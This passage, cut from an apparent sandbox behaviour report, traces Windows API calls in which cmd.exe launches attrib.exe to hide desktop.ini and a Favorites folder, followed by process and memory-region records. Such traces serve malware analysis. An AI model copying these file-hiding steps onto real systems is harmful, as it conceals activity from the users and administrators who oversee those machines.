lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.404] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.405] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.406] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.407] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.408] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.409] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.426] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.427] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0214.432] _close (_FileHandle=3) returned 0 [0214.432] GetConsoleTitleW (in: lpConsoleTitle=0x24f818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.432] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.432] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.432] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.433] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.433] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.433] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.433] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.433] GetConsoleTitleW (in: lpConsoleTitle=0x24f5ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.433] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f434, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f4fc | out: lpAttributeList=0x24f434, lpSize=0x24f4fc) returned 1 [0214.433] UpdateProcThreadAttribute (in: lpAttributeList=0x24f434, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f434, lpPreviousValue=0x0) returned 1 [0214.433] GetStartupInfoW (in: lpStartupInfo=0x24f3f0 | out: lpStartupInfo=0x24f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.433] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.433] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f4dc | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessInformation=0x24f4dc*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf1c, dwThreadId=0xb2c)) returned 1 [0214.438] CloseHandle (hObject=0x50) returned 1 [0214.438] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.438] GetEnvironmentStringsW () returned 0x282d20* [0214.438] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.438] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0214.489] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f3d0 | out: lpExitCode=0x24f3d0*=0x0) returned 1 [0214.489] CloseHandle (hObject=0x4c) returned 1 [0214.489] _vsnwprintf (in: _Buffer=0x24f518, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f3dc | out: _Buffer="00000000") returned 8 [0214.489] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.489] GetEnvironmentStringsW () returned 0x282d20* [0214.489] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.490] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.490] GetEnvironmentStringsW () returned 0x282d20* [0214.490] FreeEnvironmentStringsW (penv=0x282d20) returned 1 [0214.490] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f434 | out: lpAttributeList=0x24f434) [0214.490] GetConsoleTitleW (in: lpConsoleTitle=0x24f818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.490] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.490] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.490] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.490] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.490] FindClose (in: hFindFile=0x280820 | out: hFindFile=0x280820) returned 1 [0214.491] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.491] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.491] GetConsoleTitleW (in: lpConsoleTitle=0x24f5ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.491] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f434, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f4fc | out: lpAttributeList=0x24f434, lpSize=0x24f4fc) returned 1 [0214.491] UpdateProcThreadAttribute (in: lpAttributeList=0x24f434, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f434, lpPreviousValue=0x0) returned 1 [0214.491] GetStartupInfoW (in: lpStartupInfo=0x24f3f0 | out: lpStartupInfo=0x24f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.491] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.491] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f4dc | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessInformation=0x24f4dc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xde4, dwThreadId=0xe60)) returned 1 [0214.499] CloseHandle (hObject=0x4c) returned 1 [0214.499] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.499] GetEnvironmentStringsW () returned 0x283760* [0214.499] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.499] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.557] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f3d0 | out: lpExitCode=0x24f3d0*=0x0) returned 1 [0214.557] CloseHandle (hObject=0x50) returned 1 [0214.557] _vsnwprintf (in: _Buffer=0x24f518, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f3dc | out: _Buffer="00000000") returned 8 [0214.557] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.557] GetEnvironmentStringsW () returned 0x283760* [0214.557] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.557] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.557] GetEnvironmentStringsW () returned 0x283760* [0214.558] FreeEnvironmentStringsW (penv=0x283760) returned 1 [0214.558] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f434 | out: lpAttributeList=0x24f434) [0214.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.558] SetConsoleInputExeNameW () returned 0x1 [0214.558] GetConsoleOutputCP () returned 0x1b5 [0214.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.558] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.559] exit (_Code=0) Process: id = "531" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "530" os_parent_pid = "0xa74" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31628 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31629 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31630 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31631 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 31632 start_va = 0x210000 end_va = 0x216fff entry_point = 0x210000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31633 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31634 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31635 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31636 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31637 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31638 start_va = 0x10000 end_va = 